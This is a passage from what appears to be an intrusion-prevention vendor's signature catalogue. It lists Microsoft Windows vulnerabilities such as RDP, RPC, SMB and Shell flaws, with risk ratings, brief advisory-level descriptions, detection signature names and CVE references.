Description: A denial of service vulnerability has been reported in Microsoft Windows QUIC. The vulnerability is due to improper handling of the incoming QUIC traffic. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted packet to the target server. Successful exploitation could result in the denial of service on the target machine.
Situation: Generic_UDP-Microsoft-Windows-QUIC-Version-Negotiation-Packet-Handling-Denial-Of-Service
References:
CVE-2023-38171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38171
ms23-oct
http://technet.microsoft.com/security/bulletin/ms23-oct
Back to top

Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Improper validation of messages sent to the Remote Desktop Licensing service causes a vulnerability in Windows. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-Rdl-Service-Base24-Decoding-Remote-Code-Execution
References:
CVE-2024-38077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38077
Back to top

Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Improper validation of messages sent to the Remote Desktop Licensing service causes a vulnerability in Windows. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-Rdl-Service-Tlsrpcchallengeserver-Handling-Two-Vulnerabilities
References:
CVE-2024-38073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38073
Back to top

Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Remote Desktop.
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Windows
Software: Microsoft Windows Remote Desktop
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability in Microsoft Windows Remote Desktop, Windows versions 7,8,10, and Windows Server 2008, 2012, 2016, 2019, which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to the improper validation when decompressing dynamic virtual channel PDUs.
Situation: Generic_CS-Microsoft-Windows-RDS-DVC-Decompression-Heap-Buffer-Overflow
References:
CVE-2019-1181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1181
Back to top

Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1052-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There has been reported an XML external entity (XXE) injection vulnerability in the Remote Assistance component of Microsoft Windows. A remote attacker could gain information of file contents from the target system, if vulnerability is successfully exploited.
Situation: File-TextId_Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure
References:
CVE-2018-0878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0878
Back to top

Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0015
References:
CVE-2016-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0015
MS16-007
http://technet.microsoft.com/security/bulletin/MS16-007
Back to top

Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0016
References:
CVE-2016-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0016
MS16-007
http://technet.microsoft.com/security/bulletin/MS16-007
Back to top

Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: File-OLE_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-RTF_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-TextId_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
References:
CVE-2016-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0018
MS16-007
http://technet.microsoft.com/security/bulletin/MS16-007
Back to top

Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a heap overflow vulnerability in Microsoft Windows. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Microsoft-Windows-Remote-Code-Execution-CVE-2018-8475
References:
CVE-2018-8475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Input Validation
Description: A remote code execution vulnerability has been reported in the Remote Desktop Gateway (RDP GW) service of Microsoft Windows Server. This vulnerability is due to improper processing of crafted RDP packets over UDP. A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the attacker being able to execute arbitrary code with the privileges of the RDP Gateway service. An unsuccessful attack may result in the service abnormally terminating.
Situation: Generic_UDP-Microsoft-Windows-Remote-Desktop-Gateway-CVE-2020-0610-Code-Execution
References:
CVE-2020-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0610
ms20-jan
http://technet.microsoft.com/security/bulletin/ms20-jan
Back to top

Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: Moderate
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Platform: Windows
Software: <os>
Type: Directory Traversal
Description: Improper validation of messages sent to the Remote Desktop Licensing service causes an arbitrary file deletion vulnerability in Windows. A successful exploitation allows an attacker to delete files on the target system.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-Remote-Desktop-Licensing-Service-Arbitrary-File-Deletion
References:
CVE-2024-43454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43454
Back to top

Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A buffer overread vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper validation of messages sent to the Remote Desktop Licensing service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation could result in denial of service conditions on the target service.
Situation: MSRPC-TCP_Microsoft-Windows-Remote-Desktop-Licensing-Service-Buffer-Overread
References:
CVE-2024-38071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38071
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-Windows-Remote-Desktop-Licensing-Service-Improper-Authentication

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: An improper authentication vulnerability has been reported in Windows Remote Desktop Licensing (RDL) Service. Successful exploitation could result in authentication bypass of the vulnerable service.
Situation: MSRPC-TCP_Microsoft-Windows-RDL-Service-NTLM-Null-Session-Request
References:
CVE-2024-38099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38099
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service

About this vulnerability: A Microsoft Windows Remote Desktop Protocol Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Remote Desktop
Type: Input Validation
Description: A vulnerability in Microsoft Windows Remote Desktop Protocol which allows remote attackers to cause a denial of service condition due to the process used to validate data contained in RDP messages.
Situation: Generic_CS-Microsoft-Windows-Remote-Desktop-Protocol-Denial-of-Service
References:
CVE-2005-1218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1218
Back to top

Microsoft-Windows-Remote-Desktop-Protocol-Vulnerability-CVE-2015-2373

About this vulnerability: A remote code execution vulnerability in Microsoft Windows RDP server.
Risk: Moderate
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows RDP server.
Situation: Generic_CS-MS-Windows-RDP-Vulnerability-CVE-2015-2373
References:
CVE-2015-2373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2373
MS15-067
http://technet.microsoft.com/security/bulletin/MS15-067
Back to top

Microsoft-Windows-Remote-Desktop-Protocol-Websocketserver-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1817-5242
Last changed: sgpkg-ips-1832-5242
Platform: Windows
Software: Microsoft Windows Remote Desktop
Type: Race Condition
Description: A remote code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to a use-after-free condition triggered in the WebSocketServer component of the Remote Desktop Protocol Server when handling unexpected WebSocket disconnections. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. Successful exploitation could result in execution of arbitrary code in the context of the vulnerable service.
Situation: HTTP_CSH-Microsoft-Windows-Remote-Desktop-Protocol-Over-WebSocket
References:
CVE-2024-43582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43582
Back to top

Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows Remote Desktop Services
Risk: High
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Remote Desktop
Type: Buffer Overflow
Description: A vulnerability in the Remote Desktop Services component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to the improper validation when decompressing dynamic virtual channel PDUs.
Situation: Generic_CS-Microsoft-Windows-Remote-Desktop-Services-Heap-Buffer-Overflow
References:
CVE-2019-1182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1182
Back to top

Microsoft-Windows-Remote-Desktop-Usage

About this vulnerability: Microsfot Windows Remote Desktop usage
Risk: Low
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Microsoft Windows operating system contains a built-in remote control application, Remote Desktop. It allows sharing of desktop connections across machines. Use of this kind of application may be considered a security risk in controlled environments.
Situation: Generic_CS-Microsoft-Windows-Remote-Desktop-Connection-Attempt
Back to top

Microsoft-Windows-Remote-Procedure-Call-Vulnerability

About this vulnerability: A vulnerability Microsoft Windows RPC
Risk: Moderate
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3;Windows XP 64-bit SP2;Windows 2003;Windows 2003 SP2;Windows Vista;Windows Vista SP2;Windows 2008;Windows 7;Windows 2008 R2;Windows 8;Windows 2012;Windows RT;Windows 2012
Software: RPC
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows Remote Procedure Call (RPC).
Situation: Analyzer_Microsoft-Windows-Remote-Procedure-Call-Vulnerability
References:
CVE-2013-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3175
MS13-062
http://technet.microsoft.com/security/bulletin/MS13-062
Back to top

Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability

About this vulnerability: A code execution vulnerability in Microsoft Windows' resource URI protocol handler
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Input Validation
Description: There is a vulnerability in the resource protocol handler in Microsoft Windows. The vulnerability is caused by the lack of proper validation of API parameters. An attacker can exploit the vulnerability for code execution by manipulating an application into making API calls with malformed parameters. Any code injected into the application would be executed within the security context of the currently logged in user.
Situation: HTTP_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
File-Text_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
References:
CVE-2007-2219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2219
BID-24370
http://www.securityfocus.com/bid/24370
OSVDB-35341
http://www.osvdb.org/35341
MS07-035
http://technet.microsoft.com/security/bulletin/MS07-035
Back to top

Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1477-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Windows Remote Procedure Call. This vulnerability is due to improper checking of the size of bind_ack responses in the function ProcessBindAckOrNak in rpcrt4.dll. A remote attacker could exploit this vulnerability by enticing a user into connecting to an attacker-controlled RPC server and returning a crafted bind_ack response. Successfully exploiting this vulnerability could result in remote code execution in the context of the application making the RPC call.
Situation: MSRPC_SS-Microsoft-Windows-RPC-Runtime-Processbindackornak-Integer-Overflow
References:
CVE-2022-26809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26809
ms22-apr
http://technet.microsoft.com/security/bulletin/ms22-apr
Back to top

Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An out of bounds access vulnerability has been reported in the Windows Routing and Remote Access (RRAS) Service. The vulnerability is due to improper handling RPC requests in Routing and Remote Access service. A remote attacker could exploit this vulnerability by sending maliciously crafted RPC requests to a target server running Routing and Remote Access service. Successful exploitation could result in execution of arbitrary code with SYSTEM privileges.
Situation: SMB-TCP_Microsoft-Windows-RRAS-Service-Out-Of-Bounds-Access
References:
CVE-2017-11885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11885
ms17-dec
http://technet.microsoft.com/security/bulletin/ms17-dec
Back to top

Microsoft-Windows-Schannel-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in Microsoft SChannel. The vulnerability is due to improper processing of specially crafted packets that leads to a buffer overflow. A remote, unauthenticated attacker can exploit this vulnerability by sending specially crafted packets to the target machine. Successful exploitation could result in arbitrary code execution on the affected system.
Situation: HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow
HTTPS_CS-Microsoft-Windows-Schannel-Buffer-Overflow-2
References:
CVE-2014-6321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6321
BID-70954
http://www.securityfocus.com/bid/70954
OSVDB-114506
http://www.osvdb.org/114506
MS14-066
http://technet.microsoft.com/security/bulletin/MS14-066
Back to top

Microsoft-Windows-Scripting-Engines-Information-Disclosure-CVE-2011-0031

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 2008 R2
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_SS-Microsoft-Windows-Scripting-Engine-Information-Disclosure-CVE-2011-0031
File-Text_Microsoft-Windows-Script-Engine-Information-Disclosure-CVE-2011-0031
References:
CVE-2011-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0031
BID-46139
http://www.securityfocus.com/bid/46139
OSVDB-70827
http://www.osvdb.org/70827
MS11-009
http://technet.microsoft.com/security/bulletin/MS11-009
Back to top

Microsoft-Windows-Scripting-Engines-Script-Encoding

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A memory corruption vulnerability exists in Microsoft Windows Scripting Engine. The flaw is due to a boundary error when decoding scripts in web pages. This vulnerability can be exploited by remote attacker to inject and execute arbitrary code on the target system.
Situation: File-Text_Microsoft-Windows-Scripting-Engines-Script-Encoding
References:
CVE-2008-0083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0083
BID-28551
http://www.securityfocus.com/bid/28551
MS08-022
http://technet.microsoft.com/security/bulletin/MS08-022
Back to top

Microsoft-Windows-Search-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an information disclosure vulnerability in the Search component of Microsoft Windows. A remote attacker could use this to disclose information which could be used to further compromise the user's system.
Situation: SMB-TCP_CS-Microsoft-Windows-Search-Information-Disclosure
References:
CVE-2017-8544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8544
ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun
Back to top

Microsoft-Windows-Search-Protocol-Handler-Command-Execution

About this vulnerability: A vulnerability in the search protocol handler in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 2008
Software: <os>
Type: Input Validation
Description: There is a command execution vulnerability in Microsoft Windows. There is a design error in the way Windows Explorer handles search queries provided by the search-ms protocol handler. Remote attackers could exploit this vulnerability by persuading a target user to visit a specially crafted web page. Successful exploitation allows arbitrary command execution in the security context of the currently logged on user.
Situation: HTTP_SS-Microsoft-Windows-Search-Protocol-Handler-Command-Execution
File-Text_Microsoft-Windows-Search-Protocol-Handler-Command-Execution
References:
CVE-2008-4269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4269
BID-32652
http://www.securityfocus.com/bid/32652
MS08-075
http://technet.microsoft.com/security/bulletin/MS08-075
Back to top

Microsoft-Windows-Search-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: SMB-TCP_CS-Microsoft-Windows-Search-Type-Confusion
References:
CVE-2017-8620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8620
Back to top

Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1775-5242
Last changed: sgpkg-ips-1775-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A bypass for the Mark of the Web security feature has been reported in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-Security-Feature-Bypass-CVE-2024-38217
References:
CVE-2024-38217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38217
ms24-sep
http://technet.microsoft.com/security/bulletin/ms24-sep
Back to top

Microsoft-Windows-Server-Driver-Crafted-SMB-Packet-DoS

About this vulnerability: Denial of service vulnerability in the handling of crafted SMB packets in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP SP1; Windows XP SP2; Windows 2003 SP0; Windows 2003 SP1
Software: <os>
Type: Malfunction
Description: There is a denial of service vulnerability in the handling of crafted SMB packets in Microsoft Windows due to NULL pointer dereference error in the server driver.
Situation: SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet
SMB-TCP_Microsoft-Windows-Server-Crafted-SMB-Packet-DOS
SMB-TCP_Microsoft-SRV.SYS-Pipe-Transaction-No-Null-DoS
References:
CVE-2006-3942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3942
BID-19215
http://www.securityfocus.com/bid/19215
OSVDB-27644
http://www.osvdb.org/27644
MS06-063
http://technet.microsoft.com/security/bulletin/MS06-063
Back to top

Microsoft-Windows-Server-Service-Authorization-Weakness

About this vulnerability: A vulnerability in the Server Service of Microsoft Windows.
Risk: High
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1527-5242
Platform: Windows
Software: Windows Server
Type: Insecure Configuration
Description: A vulnerability in the Server Service of Microsoft Windows, multiple versions, due to an off-by-one access check for an RPC function intended to be restricted to local only calls, which if successfully exploited could result in SMB over QUIC certificate tampering or use as part of NTLM relay attacks.
Situation: SMB-TCP_Microsoft-Windows-Server-Service-Authorization-Weakness
References:
CVE-2022-30216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30216
Back to top

Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution

About this vulnerability: Detects remote code execution exploits against Microsoft Windows via a crafted SMB Rename request
Risk: Moderate
First detected in: sgpkg-ips-82-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP4; Windows XP SP1; Windows XP SP2; Windows 2003; Windows 2003 SP1
Software: <os>
Type: Malfunction
Description: There is a remote code execution vulnerability in the handling of crafted SMB Rename requests in Microsoft Windows. By successfully exploiting this vulnerability, an authenticated remote attacker can cause a DoS or execute arbitrary code with SYSTEM privileges.
Situation: SMB-TCP_CHS-Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution
References:
CVE-2006-4696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4696
BID-20373
http://www.securityfocus.com/bid/20373
MS06-063
http://technet.microsoft.com/security/bulletin/MS06-063
Back to top

Microsoft-Windows-Sharepoint-Services-Cross-Site-Scripting

About this vulnerability: A cross-site scripting vulnerability in Microsoft Office SharePoint Server
Risk: Low
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Microsoft Office SharePoint Server. The flaw is due to a lack of input validation when processing the URL request from the client. The flaw may be exploited by malicious users to execute arbitrary HTML code on target user's web browser in the context of a trusted web site.
References:
CVE-2007-2581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2581
BID-23832
http://www.securityfocus.com/bid/23832
OSVDB-37630
http://www.osvdb.org/37630
MS07-059
http://technet.microsoft.com/security/bulletin/MS07-059
Back to top

Microsoft-Windows-Shell-File-Name-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows Shell. The vulnerability is due to the way the Windows shell handles file and directory names. An attacker can exploit this vulnerability by enticing a user to open a file or directory with a specially crafted name. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: SMB-TCP_Microsoft-Windows-Shell-File-Name-Code-Execution
File-TextId_Microsoft-Windows-Shell-File-Name-Code-Execution
References:
CVE-2012-0175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0175
BID-54307
http://www.securityfocus.com/bid/54307
OSVDB-83656
http://www.osvdb.org/83656
MS12-048
http://technet.microsoft.com/security/bulletin/MS12-048
Back to top

Microsoft-Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A heap buffer overflow vulnerability exists in Microsoft Windows Shell Graphics Processing. The vulnerability is due to an integer overflow error when processing a width value of a thumbnail image. An attacker can exploit this vulnerability by enticing a user to handle a specially crafted file. The file could be embedded in Office documents or a .MIC file. This vulnerability may be triggered by previewing the malicious file in thumbnail view. Successful exploitation could lead to arbitrary code execution. Note that CVE-2010-3970 covers two different vulnerabilities. This report covers the integer overflow announced by iDefense whereas FSC20110104-03 covers the stack buffer overflow.
Situation: File-OLE_Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow
References:
CVE-2010-3970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3970
BID-45662
http://www.securityfocus.com/bid/45662
MS11-006
http://technet.microsoft.com/security/bulletin/MS11-006
Back to top

Microsoft-Windows-Shell-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in the Microsoft Windows Shell pertaining to the method of launching applications. By using a specially crafted file name, an attacker can mask the file-type of a file. The attacker can then entice a user to open a file which appears to be innocuous, but which results in the remote execution of code. When the victim opens a malicious link either by clicking on it directly or through HTTP redirection, he/she is prompted with a "File Download" dialogue for action to be taken on the remote content. The file name of the remote content would be displayed with an apparently harmless file name extension. For example, the malicious file name could masquerade as a video clip (e.g, xxx.mpeg). If the user selects "Open", an application that is associated with the CLSID, used as the file extension, is then run and passed the remote content. If the file name contains a CLSID that allows for code execution, and the remote content contains executable code then code is executed in the Local Security Zone. If the file name contains URL encoding, some applications will launch but will not load the file; otherwise, the script is executedn. Further target behaviour is dependent on the content of the malicious code. If the user selected "Save", a "Save As" dialogue is displayed for the location and name the remote content should be saved as. The suggested file name contains the CLSID string that is defined by the attacker.
Situation: HTTP_SHS-Microsoft-Windows-Shell-Vulnerability
References:
CVE-2004-0420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0420
BID-9510
http://www.securityfocus.com/bid/9510
MS04-024
http://technet.microsoft.com/security/bulletin/MS04-024
Back to top

Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There has been reported a vulnerability in the Windows Shell component of Microsoft Windows. Successful exploitation could lead to arbitrary code execution in the target system.
Situation: File-Zip_Microsoft-Windows-Shell-Zip-File-Remote-Code-Execution
References:
CVE-2018-0883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0883
Back to top

Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution

About this vulnerability: A vulnerability in URL protocol handlers of Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003
Software: Adobe Acrobat; Adobe Reader; mIRC; Mozilla Firefox; Netscape; Microsoft Outlook Express; Microsoft Outlook
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows that could be exploited by remote attackers to compromise a vulnerable system. The issue exists in the interaction between ShellExecute and IE7 URLMon component when handling malformed URLs. Successful exploitation would allow the attacker to execute arbitrary command on the vulnerable client system within the context of the logged in user.
Situation: HTTP_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-PDF_Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
File-Text_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-TextId_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
References:
CVE-2007-3896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3896
BID-25945
http://www.securityfocus.com/bid/25945
MS07-061
http://technet.microsoft.com/security/bulletin/MS07-061
Back to top

Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A security feature bypass vulnerability has been reported in Microsoft Windows SmartScreen. This vulnerability is due to improper handling of Authenticode signatures. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted executable or visit a malicious link. Successful exploitation could result in the bypass of SmartScreen security warnings.
Situation: File-Text_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
File-Exe_Microsoft-Windows-SmartScreen-Security-Feature-Bypass-CVE-2022-44698
References:
CVE-2022-44698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44698
ms22-dec
http://technet.microsoft.com/security/bulletin/ms22-dec
Back to top

Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-184-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows Vista; Windows 2003; Windows 2008
Software: <os>
Type: Insecure Configuration
